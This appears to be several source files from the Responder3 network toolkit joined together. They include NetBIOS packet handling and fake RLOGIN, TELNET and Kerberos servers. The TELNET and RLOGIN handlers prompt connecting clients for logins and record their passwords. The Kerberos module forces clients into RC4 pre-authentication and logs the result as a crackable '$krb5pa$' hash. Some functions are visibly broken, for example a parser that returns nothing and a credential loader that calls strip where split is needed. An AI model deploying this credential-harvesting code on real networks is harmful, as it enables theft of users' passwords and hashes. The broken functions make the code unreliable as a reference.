		a = self.RCODE & 0xF
		a |= (self.NM_FLAGS << 4 ) & 0x7F0
		a |= (self.OPCODE.value << 11) & 0x7800
		a |= (self.RESPONSE.value << 15) & 0x8000
		t += a.to_bytes(2, byteorder = 'big', signed = False)
		#flags part end
		t += self.QDCOUNT.to_bytes(2, byteorder = 'big', signed = False)
		t += self.ANCOUNT.to_bytes(2, byteorder = 'big', signed = False)
		t += self.NSCOUNT.to_bytes(2, byteorder = 'big', signed = False)
		t += self.ARCOUNT.to_bytes(2, byteorder = 'big', signed = False)

		for q in self.Questions:
			t += q.to_bytes()

		for q in self.Answers:
			t += q.to_bytes()

		for q in self.Authorities:
			t += q.to_bytes()

		for q in self.Additionals:
			t += q.to_bytes()

		return t


	def __repr__(self):
		t  = '== NBTNSPacket ==\r\n'
		t += 'TransactionID %s\r\n' % self.NAME_TRN_ID.hex()
		t += 'RESPONSE : %s\r\n' % self.RESPONSE.name
		t += 'OPCODE   : %s\r\n' % self.OPCODE.name
		t += 'NM_FLAGS : %s\r\n' % repr(self.NM_FLAGS)
		t += 'RCODE    : %s\r\n' % self.RCODE
		t += 'QDCOUNT  : %s\r\n' % self.QDCOUNT
		t += 'ANCOUNT  : %s\r\n' % self.ANCOUNT
		t += 'NSCOUNT  : %s\r\n' % self.NSCOUNT
		t += 'ARCOUNT  : %s\r\n' % self.ARCOUNT

		for question in self.Questions:
			t+= repr(question)

		for answer in self.Answers:
			t+= repr(answer)

		return t


class NBQuestion():
	def __init__(self):
		self.QNAME = None
		self.QTYPE = None
		self.QCLASS = None

	def from_bytes(bbuff):
		return NBQuestion.from_buffer(io.BytesIO(bbuff))

	def from_buffer(buff):
		qst = NBQuestion()
		qst.QNAME = NBName.from_buffer(buff)
		#print(repr(qst.QNAME))
		qst.QTYPE  = NBQType(int.from_bytes(buff.read(2), byteorder = 'big'))
		qst.QCLASS = NBQClass(int.from_bytes(buff.read(2), byteorder = 'big'))

		return qst

	def to_bytes(self):
		t  = self.QNAME.to_bytes()
		t += self.QTYPE.value.to_bytes(2, byteorder = 'big', signed = False)
		t += self.QCLASS.value.to_bytes(2, byteorder = 'big', signed = False)

		return t

	def construct(self, qname, qtype, qclass):
		self.QNAME     = qname
		self.QTYPE     = qtype
		self.QCLASS    = qclass

	def __repr__(self):
		t = '== NetBIOS Question ==\r\n'
		t+= 'QNAME:  %s\r\n' % self.QNAME
		t+= 'QTYPE:  %s\r\n' % self.QTYPE.name
		t+= 'QCLASS: %s\r\n' % self.QCLASS.name
		return t

class NBResource():
	def __init__(self):
		self.NAME     = None
		self.TYPE     = None
		self.CLASS    = None
		self.TTL      = None
		self.RDLENGTH = None
		self.RDATA    = None

	def from_bytes(bbuff):
		return NBResource.from_buffer(io.BytesIO(bbuff))

	def from_buffer(buff):
		rs = NBResource()
		rs.NAME     = NBName.from_buffer(buff)
		rs.TYPE     = NBRType(int.from_bytes(buff.read(2), byteorder = 'big'))
		rs.CLASS    = NBRClass(int.from_bytes(buff.read(2), byteorder = 'big'))
		rs.TTL      = int.from_bytes(buff.read(4), byteorder = 'big')
		rs.RDLENGTH = int.from_bytes(buff.read(2), byteorder = 'big')
		trdata      = buff.read(rs.RDLENGTH)

		if rs.TYPE == NBRType.A and rs.QCLASS == NBRClass.IN:
			rs.RDATA = ipaddress.IPv4Address(trdata)

		#TODO for other types :)
		else:
			rs.RDATA = trdata

	
	def to_bytes(self):
		t  = self.NAME.to_bytes()
		t += self.TYPE.value.to_bytes(2, byteorder = 'big', signed = False)
		t += self.CLASS.value.to_bytes(2, byteorder = 'big', signed = False)
		t += self.TTL.to_bytes(4, byteorder = 'big', signed = False)
		t += self.RDLENGTH.to_bytes(2, byteorder = 'big', signed = False)
		t += self.RDATA

		return t
	
	def construct(self, name, rtype, ip, flags = 0x0000, ttl = 3000, rclass = NBRClass.IN):
		self.NAME     = name
		self.TYPE     = rtype
		self.CLASS    = rclass
		self.TTL      = ttl

		if self.TYPE == NBRType.NB and self.CLASS == NBRClass.IN:
			self.RDATA = flags.to_bytes(2, byteorder = 'big', signed = False)
			self.RDATA += ip.packed

		self.RDLENGTH = len(self.RDATA)

	def __repr__(self):
		t = '== NetBIOS Resource ==\r\n'
		t+= 'NAME:  %s\r\n' % self.NAME
		t+= 'TYPE:  %s\r\n' % self.TYPE.name
		t+= 'CLASS: %s\r\n' % self.CLASS.name
		t+= 'TTL: %s\r\n' % self.TTL
		t+= 'RDLENGTH: %s\r\n' % self.RDLENGTH
		t+= 'RDATA: %s\r\n' % repr(self.RDATA)
		return t

#https://msdn.microsoft.com/en-us/library/cc224454.aspx
class NBSuffixGroup(enum.Enum):
	MACHINE_GROUP   = 0x00
	MASTER_BROWSER  = 0x01
	BROWSER_SERVICE = 0x1E

	@classmethod
	def has_value(cls, value):
		return any(value == item.value for item in cls)

class NBSuffixUnique(enum.Enum):
	WORKSTATION   = 0x00
	DOMAIN        = 0x1B
	MACHINE_GROUP = 0x1D
	SERVER        = 0x20
	DOMAIN_CONTROLLER = 0x1C #guess from wireshark
	UNKNOWN_1     = 0x19
	UNKNOWN_2     = 0x48

	@classmethod
	def has_value(cls, value):
		return any(value == item.value for item in cls)

class NBName():
	def __init__(self):
		self.length = None
		self.name   = None #string
		self.suffix = None

	def from_bytes(bbuff):
		return NBName.from_buffer(io.BytesIO(bbuff))

	def from_buffer(buff):
		name = NBName()
		name.length = int.from_bytes(buff.read(1), byteorder = 'big')
		if name.length == 0x20: #compressed_name
			temp = NBName.decode_NS(buff.read(name.length))
		else: #pointer, most likely
			ptr = int.from_bytes(buff.read(1), byteorder = 'big')
			pos = buff.tell()
			buff.seek(ptr, io.SEEK_SET)
			tlen = int.from_bytes(buff.read(1), byteorder = 'big')
			temp = NBName.decode_NS(buff.read(tlen))
			buff.seek(pos, io.SEEK_SET)
			#debug
			#pos = buff.tell()
			#print(buff.read().hex())
			#buff.seek(pos, io.SEEK_SET)

		name.name = temp[:-1].strip()
		if NBSuffixUnique.has_value(ord(temp[-1])):
			name.suffix = NBSuffixUnique(ord(temp[-1]))
		else:
			name.suffix = NBSuffixGroup(ord(temp[-1]))
		if name.length == 0x20:
			zero = buff.read(1)
		return name

	def construct(name, suffix = NBSuffixUnique.WORKSTATION):
		assert len(name) == 15, 'NBNames max size is 15 chars'
		nbname = NBName()
		nbname.suffix = suffix
		nbname.name   = name
		nbname.length = len(NBName.encode_NS(name, suffix.value))
		return name

	def to_bytes(self):
		t  = self.length.to_bytes(1, byteorder = 'big', signed = False)
		t += NBName.encode_NS(self.name, self.suffix.value)
		t += b'\x00'
		return t

	def encode_NS(name, suffix):
		#encoded http://www.ietf.org/rfc/rfc1001.txt
		name = name.encode()
		name = name.ljust(15, b' ')
		name = name.upper()
		name+= suffix.to_bytes(1, byteorder = 'big', signed = False)
		temp = b''
		for c in name:
			temp += (((c & 0xF0) >> 4) + 0x41).to_bytes(1, byteorder = 'big', signed = False)
			temp += ((c & 0x0F) + 0x41).to_bytes(1, byteorder = 'big', signed = False)
		return temp

	def decode_NS(encoded_name):
		#encoded http://www.ietf.org/rfc/rfc1001.txt
		name_raw = ''
		transform = [((i - 0x41)& 0x0F) for i in encoded_name]
		i = 0
		while i < len(transform):
			name_raw += chr(transform[i] << 4 | transform[i+1] ) 
			i+=2
		return name_raw

	def __repr__(self):
		t = '== NBName ==\r\n'
		t += 'name  : %s \r\n' % self.name
		t += 'suffix: %s \r\n' % repr(self.suffix)
		t += 'length: %s \r\n' % repr(self.length)
		return t


import enum
import logging
import asyncio

from responder3.core.logging.logger import *
from responder3.core.asyncio_helpers import R3ConnectionClosed
from responder3.core.commons import *
from responder3.protocols.RLOGIN import *
from responder3.core.servertemplate import ResponderServer, ResponderServerSession




class RLOGINSession(ResponderServerSession):
	def __init__(self, connection, log_queue):
		ResponderServerSession.__init__(self, connection, log_queue, self.__class__.__name__)
		self.current_state = RloginSessionState.BEFORE_AUTH

class RLOGIN(ResponderServer):
	def init(self):
		pass

	async def send_data(self, data):
		self.cwriter.write(data)
		await self.cwriter.drain()

	@r3trafficlogexception
	async def run(self):
		# main loop
		while not self.shutdown_evt.is_set():
			if self.session.current_state == RloginSessionState.BEFORE_AUTH:
				try:
					result = await asyncio.gather(*[AuthenticationMessage.from_streamreader(self.creader, timeout=None)], return_exceptions=True)

				except asyncio.CancelledError as e:
					raise e
				if isinstance(result[0], R3ConnectionClosed):
					return
				elif isinstance(result[0], Exception):
					raise result[0]
				else:
					auth_msg = result[0]

				await self.logger.credential(auth_msg.to_credential())

				#no authenticator for now
				return

				# In case of succsess, send a null byte and set current_state
				#self.session.current_state = RloginSessionState.AUTHENTICATED
				#await self.send_data(b'\x00')
			
			elif self.session.current_state == RloginSessionState.AUTHENTICATED:
				#raise NotImplementedError
				return
			else:
				raise Exception('Unknown RLOGIN state!')




# Module to grab Kerberosv5 krb5pa "hashes" (encrypted timestamp)

import logging
import asyncio


from responder3.core.logging.logger import *
from responder3.core.asyncio_helpers import R3ConnectionClosed
from responder3.core.commons import *
from responder3.protocols.KerberosV5 import *
from responder3.core.servertemplate import ResponderServer, ResponderServerSession

class KERBEROSSession(ResponderServerSession):
	def __init__(self, connection, log_queue):
		ResponderServerSession.__init__(self, connection, log_queue, self.__class__.__name__)
		self.parser = KerberosParser

	def __repr__(self):
		t  = '== KerberosSession ==\r\n'
		return t


class KERBEROS(ResponderServer):
	def init(self):
		self.parse_settings()
		
	def parse_settings(self):
		pass			
			
	async def request_preauth(self, realm):
		"""
		Sending back kerberos error message to force client to yeild the encripted timestamp.
		We are sending RC4 cipher as the only encryption type, you may want to extend it to your needs
		Be careful, for AES enctype you'd need to send additional data (salt) as well!
		
		TODO: e-data field needs to be extended to match windows specs
		"""
		
		#contructing error message
		now = datetime.datetime.utcnow()
		
		ed = ETYPE_INFO2([ETYPE_INFO2_ENTRY({'etype' : EncryptionType.ARCFOUR_HMAC_MD5.value})])
		pa = PA_DATA({'padata-type': PaDataType.ETYPE_INFO2.value, 'padata-value': ed.dump()})
		
		t = {}
		t['pvno'] = krb5_pvno
		t['msg-type'] = MESSAGE_TYPE.KRB_ERROR.value
		t['error-code'] = 25 #enum is missiong for this
		t['stime'] = now
		t['susec'] = now.microsecond
		t['realm'] = realm
		t['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', realm]})
		t['e-data'] = METHOD_DATA([pa]).dump()
		
		error = KRB_ERROR(t).dump()
		
		#extending error message bytes with length field
		data = len(error).to_bytes(4, byteorder = 'big', signed = False)
		
		#sending error message
		self.cwriter.write(data + error)
		await self.cwriter.drain()
		
		
	@r3trafficlogexception
	async def run(self):
		while not self.shutdown_evt.is_set():
			try:
				result = await asyncio.gather(*[asyncio.wait_for(self.session.parser.from_streamreader(self.creader), timeout=None)], return_exceptions=True)
			except asyncio.CancelledError as e:
				raise e
			if isinstance(result[0], R3ConnectionClosed):
				return
			elif isinstance(result[0], Exception):
				raise result[0]
			else:
				msg = result[0]

			asreq = msg.native
			realm = asreq['req-body']['realm']
			cname = asreq['req-body']['cname']['name-string'][0]
			for padata in asreq['padata']:
				if padata['padata-type'] == int(PADATA_TYPE('ENC-TIMESTAMP')):
					edata = EncryptedData.load(padata['padata-value']).native
					etype = edata['etype']
					cipher = edata['cipher'].hex()
					
					fullhash = "$krb5pa$%s$%s$%s$dummy$%s" % (etype, cname, realm, cipher)
					cred = Credential('krb5pa',
							domain = realm,
							username= cname,
							fullhash=fullhash
						)
					await self.logger.credential(cred)
					return
				
			#message did not contain authentication data, requesting padata
			await self.request_preauth(realm)
			return



import enum
import logging
import asyncio

from responder3.core.logging.logger import *
from responder3.core.asyncio_helpers import R3ConnectionClosed
from responder3.core.commons import *
from responder3.protocols.TELNET import *
from responder3.core.servertemplate import ResponderServer, ResponderServerSession


class TELNETSession(ResponderServerSession):
	def __init__(self, connection, log_queue):
		ResponderServerSession.__init__(self, connection, log_queue, self.__class__.__name__)
		self.parser = TELNETMessageParser(self)
		self.banner = None

	def __repr__(self):
		t = '== TELNET Session ==\r\n'
		return t


class TELNET(ResponderServer):
	def init(self):
		if self.settings:
			self.parse_settings()
			return
		self.set_default_settings()

	def set_default_settings(self):
		self.session.banner = ''

	def parse_settings(self):
		if 'banner' in self.settings:
			self.session.banner = self.settings['banner']
		
	async def send_data(self, data, timeout = None):
		self.cwriter.write(data) # data must be bytes
		await self.cwriter.drain()
		
	async def send_message(self, data, timeout = None): 
		"""
		Sends actual ascii data to client
		MUST NOT contain the end of line char!
		"""
		self.cwriter.write((data + '\r\n').encode())
		await self.cwriter.drain()

	@r3trafficlogexception
	async def run(self):
		while not self.shutdown_evt.is_set():
			try:
				result = await asyncio.gather(*[asyncio.wait_for(self.session.parser.from_streamreader(self.creader), timeout=None)], return_exceptions=True)
			except asyncio.CancelledError as e:
				raise e
			if isinstance(result[0], R3ConnectionClosed):
				return
			elif isinstance(result[0], Exception):
				raise result[0]
			else:
				data = result[0]

			if isinstance(data, bytes):
				#extended options list, not handled bc it's a dumb server
				if self.session.banner:
					await self.send_message(self.session.banner)
				await self.send_message('Username: ')
				continue
			if not self.username:
				self.username = data
				await self.send_message('Password: ')
				continue
			if not self.password:
				self.password = data
				cred = Credential('TELNET',
						username = self.username,
						password = self.password,
						fullhash='%s:%s' % (self.username, self.password)
					)
				await self.logger.credential(cred)
				return
					
			#await self.logger.debug('Incoming data: %s' % repr(data))



"""
TODO: this would need to be re-ported to use the generic websocket server to have a unified interface
"""

import asyncio
import websockets
import traceback
import uuid
import itertools


from responder3.core.manager.comms import *
from responder3.core.logging.logger import *
from responder3.core.gwss import *
from responder3.core.ssl import SSLContextBuilder

class Responder3ClientSession:
	def __init__(self, client_id, ws, log_queue, manager_log_queue, cmd_queue_in, cmd_queue_out, is_NATed = False):
		self.client_id = client_id
		self.ws = ws
		self.logger = Logger('Responder3ClientSession', logQ = log_queue)
		self.shutdown_evt = asyncio.Event()
		self.manager_log_queue = manager_log_queue
		self.cmd_queue_in = cmd_queue_in
		self.cmd_queue_out = cmd_queue_out
		self.is_NATed = False #indicates is the client is behind a NAT firewall, in that case we need to rely on the IP info of the client from the client itself
		
		self.remote_ip, self.remote_port = self.ws.remote_address
		self.remote_addr_s = '%s:%d' % (self.remote_ip, self.remote_port)
		self.classloader = R3ClientCommsClassLoader()

		
	@r3exception
	async def handle_commands_in(self):
		while True:
			cmd = await self.cmd_queue_in.get()
			try:
				await self.ws.send(cmd.to_json())
			except Exception as e:
				await self.logger.exception()
				self.shutdown_evt.set()
				return
		
	@r3exception
	async def handle_commands_out(self):
		while True:
			try:
				rply_data = await self.ws.recv()
			except Exception as e:
				await self.logger.exception()
				self.shutdown_evt.set()
				return
			try:
				msg = self.classloader.from_json(rply_data)
			except Exception as e:
				await self.logger.exception('Failed to parse incoming data!')
				continue
				
			if isinstance(msg, R3CliLog):
				if self.is_NATed == False:
					msg.remote_ip = self.remote_ip
					msg.remote_port = self.remote_port
				msg.client_id = self.client_id
				await self.manager_log_queue.put(msg)
			
			elif isinstance(msg, (R3CliServerStopRply, R3CliListServersRply, R3CliCreateServerRply, R3CliListInterfacesRply)):
				msg.client_id = self.client_id
				await self.cmd_queue_out.put(msg)
				
			else:
				await self.logger.info('Client sent unknown message! %s' % type(msg))		
		
	@r3exception
	async def run(self):
		asyncio.ensure_future(self.handle_commands_in())
		asyncio.ensure_future(self.handle_commands_out())
		#await self.cmd_queue_in.put(R3CliListInterfacesCmd())
			
		await self.shutdown_evt.wait()
	

class Responder3ManagerServer:
	def __init__(self, listen_ip, listen_port, config, log_queue, manager_log_queue, cmd_q_in, cmd_q_out, shutdown_evt, ssl_ctx = None):
		self.config = config
		self.logger = Logger('Responder3ManagerServer', logQ = log_queue)
		self.manager_log_queue = manager_log_queue #works in one way only, to inject log messages from remote clients
		self.cmd_q_in = cmd_q_in #commands from the server manager to the clients
		self.cmd_q_out = cmd_q_out #command results from clients to server manager
		self.shutdown_evt = shutdown_evt #asnycio.Event to signal shutdown of the server
		
		self.listen_ip = listen_ip
		self.listen_port = listen_port
		self.ssl_ctx = ssl_ctx
		if self.ssl_ctx:
			self.ssl_ctx = SSLContextBuilder.from_dict(ssl_ctx)
		self.clients = {} #client_id -> Responder3ClientSession

	@r3exception
	async def client_cmd_dispatcher(self):
		while not self.shutdown_evt.is_set():
			client_id, cmd = await self.cmd_q_in.get()
			if client_id == 'ALL':
				for client_id in self.clients:
					try:
						await self.clients[client_id].cmd_queue_in.put(cmd)
					except Exception as e:
						traceback.print_exc()
				continue

			if client_id not in self.clients:
				print('Client ID doesnt exist! %s' % client_id)
				continue

			await self.clients[client_id].cmd_queue_in.put(cmd)



		
	@r3exception
	async def client_handler(self, ws, path):
		await self.logger.debug('Manager Client connected from %s' % ('%s:%d' % ws.remote_address, ))
		################################################################################
		#!!!! If you see an error here, websockets library might have changed
		#By default the library doesnt offer high-level api to grab the client certificate
		#Check the new documentation of websockets if error comes in here!
		client_cert = ws.writer.get_extra_info('peercert') 
		################################################################################
		if not client_cert:
			client_id = str(uuid.uuid4()) #change this to ssl CN of the client!
		else:
			#https://stackoverflow.com/questions/50548709/cant-receive-tls-certificate-using-getpeercert-ssl-certificate-verify-failed
			#I have no idea how this works tho
			client_id = dict(itertools.chain(*client_cert["subject"]))["commonName"]
		
		await self.logger.info('[%s] connected from %s' % (client_id, '%s:%d' % ws.remote_address))
		
		client_cmd_queue = asyncio.Queue()
		cs = Responder3ClientSession(client_id, ws, self.logger.logQ, self.manager_log_queue, client_cmd_queue, self.cmd_q_out)
		self.clients[client_id] = cs
		await cs.run()
		del self.clients[client_id]
		await self.logger.info('[%s] disconnected' % client_id)
		
		
		
	@r3exception
	async def run(self):
		asyncio.ensure_future(self.client_cmd_dispatcher())
		server = await websockets.serve(self.client_handler, self.listen_ip, self.listen_port, ssl=self.ssl_ctx)
		await server.wait_closed()
		
		

		
if __name__ == '__main__':
	async def print_cmd_queue(cmd_q_out):
		while True:
			cmd = await cmd_q_out.get()
			print('print_cmd_queue')
			print(cmd)
		
	config = {}
	logger = Logger('Responder3ManagerServer')
	manager_log_queue = asyncio.Queue()
	cmd_q_in = asyncio.Queue()
	cmd_q_out = asyncio.Queue()
	shutdown_evt = asyncio.Queue()
	
	r3m = Responder3ManagerServer(config, logger, manager_log_queue, cmd_q_in, cmd_q_out, shutdown_evt)
	
	asyncio.ensure_future(logger.run())
	asyncio.ensure_future(print_cmd_queue(cmd_q_out))
	loop = asyncio.get_event_loop()	
	loop.run_until_complete(r3m.run())
	
	



from responder3.protocols.authentication_providers.dictauth import DictAuth

class FileAuth(DictAuth):
	def __init__(self, ):
		DictAuth.__init__(self)
		self.credential_file = None
		self.parse_credfile()

	def setup_defaults(self):
		raise Exception('There are no default settings for fileauth!')

	def setup(self, d):
		self.credential_file = d['credfile']
		self.parse_credfile()

	def test_domain(self, domain):
		return domain in self.credentials

	def parse_credfile(self):
		with open(self.credential_file, 'r') as f:
			for line in f:
				line = line.strip()
				domain, username, password = line.strip(':')
				if domain not in self.credentials:
					self.credentials[domain] = {}
				if username not in self.credentials[domain]:
					self.credentials[domain][username] = password
				else:
					print('Multiple password for %s:%s, owerwriting password!' % (domain, username))


import ipaddress
import socket

from responder3.core.interfaces.NetworkInterface import NetworkInterface

def get_linux_ifaddrs():
	"""
	Enumerates all network interfaces and all IP addresses assigned for each interfaces both IPv4 and IPv6 on Linux host
	:return: list of NetworkInterface
	"""
	from socket import AF_INET, AF_INET6, inet_ntop
	from ctypes import (
		Structure, Union, POINTER,
		pointer, get_errno, cast,
		c_ushort, c_byte, c_void_p, c_char_p, c_uint, c_int, c_uint16, c_uint32
	)
	import ctypes.util
	import ctypes

	class struct_sockaddr(Structure):
		_fields_ = [
			('sa_family', c_ushort),
			('sa_data', c_byte * 14),]

	class struct_sockaddr_in(Structure):
		_fields_ = [
			('sin_family', c_ushort),
			('sin_port', c_uint16),
			('sin_addr', c_byte * 4)]

	class struct_sockaddr_in6(Structure):
		_fields_ = [
			('sin6_family', c_ushort),
			('sin6_port', c_uint16),
			('sin6_flowinfo', c_uint32),
			('sin6_addr', c_byte * 16),
			('sin6_scope_id', c_uint32)]

	class union_ifa_ifu(Union):
		_fields_ = [
			('ifu_broadaddr', POINTER(struct_sockaddr)),
			('ifu_dstaddr', POINTER(struct_sockaddr)),]

	class struct_ifaddrs(Structure):
		pass

	struct_ifaddrs._fields_ = [
		('ifa_next', POINTER(struct_ifaddrs)),
		('ifa_name', c_char_p),
		('ifa_flags', c_uint),
		('ifa_addr', POINTER(struct_sockaddr)),
		('ifa_netmask', POINTER(struct_sockaddr)),
		('ifa_ifu', union_ifa_ifu),
		('ifa_data', c_void_p),]

	libc = ctypes.CDLL(ctypes.util.find_library('c'))

	def ifap_iter(ifap):
		ifa = ifap.contents
		while True:
			yield ifa
			if not ifa.ifa_next:
				break
			ifa = ifa.ifa_next.contents

	def getfamaddr(sa):
		family = sa.sa_family
		addr = None
		if family == AF_INET:
			sa = cast(pointer(sa), POINTER(struct_sockaddr_in)).contents
			addr = inet_ntop(family, sa.sin_addr)
		elif family == AF_INET6:
			sa = cast(pointer(sa), POINTER(struct_sockaddr_in6)).contents
			addr = inet_ntop(family, sa.sin6_addr)
		return family, addr

	ifap = POINTER(struct_ifaddrs)()
	result = libc.getifaddrs(pointer(ifap))
	if result != 0:
		raise OSError(get_errno())
	del result
	try:
		interfacesd = {}
		for ifa in ifap_iter(ifap):
			ifname = ifa.ifa_name.decode("UTF-8")
			if ifname not in interfacesd:
				interfacesd[ifname] = NetworkInterface()
				interfacesd[ifname].ifname = ifname
				interfacesd[ifname].ifindex = libc.if_nametoindex(ifname)
			if ifa.ifa_addr:
				family, addr = getfamaddr(ifa.ifa_addr.contents)
			if family in [socket.SOCK_DGRAM, socket.SOCK_STREAM]:
				interfacesd[ifname].addresses.append(ipaddress.ip_address(addr))
		return interfacesd
	finally:
		libc.freeifaddrs(ifap)




import sys
import socket
import copy
import importlib
import importlib.util
import asyncio
import datetime

from responder3.core.ssl import SSLContextBuilder
from responder3.core.commons import *
from responder3.core.logging.logtask import *
from responder3.core.logging.logger import *


from responder3.core.sockets import setup_base_socket

from responder3.core.streams.logging_streams import *

class ConnectionTask:
	def __init__(self, connection):
		self.connection = connection
		self.handler    = None
		self.created_at = datetime.datetime.utcnow()
		self.started_at = None

class ConnectionWhatchDog:
	"""
	Terminates the connection in case there wasnt any activity on it after a given period of time
	"""
	def __init__(self, task, reader, logger, connection_closing_evt, timeout = 10):
		self.target_task = task
		self.creader = reader
		self.timeout = timeout
		self.logger = logger
		self.connection_closing_evt = connection_closing_evt

	@r3exception
	async def run(self):
		while not self.connection_closing_evt.is_set():
			last_activity = (datetime.datetime.utcnow() - self.creader.last_activity).total_seconds()
			if last_activity > self.timeout:
				print('cancelling task!')
				self.target_task.cancel()
				break
				#raise Exception('Client connection timeout')
			await asyncio.sleep(self.timeout)

class Responder3ServerTask:
	def __init__(self, log_queue = None, reverse_domain_table=None, server_command_queue=None, loop=None, rdns_resolver = None):
		self.logger = Logger('Responder3ServerTask', logQ = log_queue)
		self.shutdown_evt = asyncio.Event()
		self.loop = loop if loop is not None else asyncio.get_event_loop()
		self.log_queue = log_queue if log_queue is not None else asyncio.Queue()
		self.reverse_domain_table = reverse_domain_table if reverse_domain_table is not None else {}
		self.server_command_queue = server_command_queue
		self.server_name = None
		self.server_config = None
		self.listener_socket_config = None
		self.listener_socket_ssl_context = None
		self.server_handler = None
		self.server_handler_settings = None
		self.server_handler_session = None
		self.server_handler_global_session = None
		self.connections = {}
		self.rdns_resolver = rdns_resolver
		self.connection_factory = ConnectionFactory(self.reverse_domain_table, self.rdns_resolver)

	@r3exception
	async def accept_client(self, client_reader, client_writer):
		"""
		Handles incoming connection.
		1. Creates connection obj
		2. Log connection
		3. Schedules a new task with the appropriate server template's run method
		4. Performs cleanup after connection terminates
		:param client_reader:
		:type client_reader: asyncio.StreamReader
		:param client_writer:
		:type client_writer: asyncio.StreamWriter
		:return: None
		"""
		client_reader = StreamReaderLogging(client_reader)
		client_writer = StreamWriterLogging(client_writer)
		connection = await self.connection_factory.from_streamwriter(client_writer)
		shutdown_evt = asyncio.Event()
		await self.logger.connection(connection, ConnectionStatus.OPENED)
		ct = ConnectionTask(connection)
		
		#setting up server temaplte
		ct.handler = self.server_handler(
			self.server_name,
			self.server_handler_settings,
			client_reader,
			client_writer,
			self.server_handler_session(connection, self.log_queue),
			self.log_queue,
			self.listener_socket_config,
			self.listener_socket_ssl_context,
			shutdown_evt,
			rdns_resolver = self.rdns_resolver,
			globalsession = self.server_handler_global_session,
			loop = self.loop
		)
		ct.started_at = datetime.datetime.utcnow()
		await self.logger.debug('Starting server task!')
		self.connections[ct] = 1

		#starting server template
		template_run_task = asyncio.create_task(ct.handler.run())

		#starting whatchdog
		whatchdog = ConnectionWhatchDog(template_run_task, client_reader, Logger('%s[WHATCHDOG]' % self.server_name, logQ = self.log_queue), ct.handler.shutdown_evt, timeout = 10)
		whatchdog_task = asyncio.create_task(whatchdog.run())

		#waiting template to finish
		await template_run_task

		ct.handler.shutdown_evt.set()
		await self.logger.connection(ct.connection, ConnectionStatus.CLOSED)

		try:
			ct.connection.writer.close()
		except Exception as e:
			#if we cannot close the socket then be it
			pass

		del self.connections[ct]
		return

	@staticmethod
	def import_template(template_name):
		"""
		Imports necessary modules for the specific type of server.
		This way we avoid importing all available modules before forking.
		:return: None
		"""
		handler_spec = importlib.util.find_spec('responder3.poisoners.%s' % template_name)
		if handler_spec is None:
			handler_spec = importlib.util.find_spec('responder3.servers.%s' % template_name)
			if handler_spec is None:
				raise Exception('Could not find the package for %s' % (template_name,))
			else:
				servermodule = importlib.import_module('responder3.servers.%s' % template_name)
		else:
			servermodule = importlib.import_module('responder3.poisoners.%s' % template_name)

		return servermodule

	@r3exception
	async def create_server(self, server_task_config):
		self.server_config = server_task_config

		if 'listener_socket_config' in server_task_config and server_task_config['listener_socket_config'] is not None:
			self.listener_socket_config = server_task_config['listener_socket_config']
		else:
			raise Exception('Server listener socket MUST be defined!')

		if 'settings' in server_task_config:
			self.server_handler_settings = copy.deepcopy(server_task_config['settings'])

		if 'handler' in server_task_config and server_task_config['handler'] is not None:
			server_module = Responder3ServerTask.import_template(
				server_task_config['handler'],
			)
			self.server_handler = getattr(server_module, server_task_config['handler'])
			self.server_handler_session = getattr(server_module, '%s%s' % (server_task_config['handler'], 'Session'))
			# global session object will be immediately instantiated, as it is global for ALL clients
			gs = getattr(server_module, '%s%s' % (server_task_config['handler'], 'GlobalSession'), None)
			if gs is not None:
				self.server_handler_global_session = gs(self.listener_socket_config, self.server_handler_settings, self.log_queue)
		else:
			raise Exception('Server Handler MUST be specified!')

		if 'bind_sslctx' in server_task_config:
			self.listener_socket_config.is_ssl_wrapped = True
			self.listener_socket_ssl_context = SSLContextBuilder.from_dict(server_task_config['bind_sslctx'], server_side=True)

		
		if self.listener_socket_ssl_context is not None:
			self.server_name = '%s-%s' % (self.server_handler.__name__, 'SSL')
		else:
			self.server_name = '%s-%s' % (self.server_handler.__name__, self.listener_socket_config.get_protocolname())

		#replacing logger with a new one that has the name now
		self.logger = Logger(self.server_name, logQ = self.log_queue)

		self.server_coro = None

		if self.listener_socket_config.bind_protocol == socket.SOCK_STREAM:
			sock = None
			if getattr(self.server_handler, "custom_socket", None) is not None and callable(
					getattr(self.server_handler, "custom_socket", None)):
				sock = self.server_handler.custom_socket(self.listener_socket_config)
			else:
				sock = setup_base_socket(self.listener_socket_config)

			self.server_coro = await asyncio.start_server(self.accept_client, sock=sock, ssl=self.listener_socket_ssl_context)

		elif self.listener_socket_config.bind_protocol == socket.SOCK_DGRAM:
			udpserver_obj = getattr(importlib.import_module('responder3.core.udpwrapper'), 'UDPServer')
			sock = None
			if getattr(self.server_handler, "custom_socket", None) is not None and callable(
					getattr(self.server_handler, "custom_socket", None)):
				sock = self.server_handler.custom_socket(self.listener_socket_config)

			udpserver = udpserver_obj(self.accept_client, self.listener_socket_config, sock=sock)
			#self.server_coro = udpserver.run()
			self.server_coro = udpserver

		else:
			raise Exception('Unknown protocol type!')

		return self.server_coro



import datetime
import asyncio

from responder3.core.logging.log_objects import * 

class StreamReaderLogging:
	def __init__(self, reader):
		self.reader = reader
		self.traffic = TrafficLog()
		self.last_activity = datetime.datetime.utcnow()

	async def log_comms(self):
		try:
			#data = await asyncio.wait_for(self.reader.read(-1), timeout = 1)
			data = await asyncio.gather(*[asyncio.wait_for(self.reader.read(-1), timeout = 1)], return_exceptions=True)
		except Exception as e:
			print('Error: %s' % str(e))
			#the error here that sometime despite cancelling the reading task
			#the task is still waiting for incoming data, which is strange
			pass
		else:
			if isinstance(data, bytes):
				self.traffic.unconsumed_buffer = data[0]
				
		return self.traffic


	async def read(self, n=-1):
		data = await self.reader.read(n=n)
		if not data:
			return data
		self.traffic.data_recv[datetime.datetime.utcnow()] = data
		self.last_activity = datetime.datetime.utcnow()
		return data

	async def readexactly(self, n):
		data = await self.reader.readexactly(n)
		if not data:
			return data
		self.traffic.data_recv[datetime.datetime.utcnow()] = data
		self.last_activity = datetime.datetime.utcnow()
		return data

	async def readuntil(self, separator=b'\n'):
		data = await self.reader.readuntil(separator=separator)
		if not data:
			return data
		self.traffic.data_recv[datetime.datetime.utcnow()] = data
		self.last_activity = datetime.datetime.utcnow()
		return data

	async def readline(self):
		data = await self.reader.readline()
		if not data:
			return data
		self.traffic.data_recv[datetime.datetime.utcnow()] = data
		self.last_activity = datetime.datetime.utcnow()
		return data

	def at_eof(self):
		return self.reader.at_eof()

	async def switch_ssl(self, new_transport):
		"""
		"""
		self.reader._transport = new_transport
		self.reader._over_ssl = True
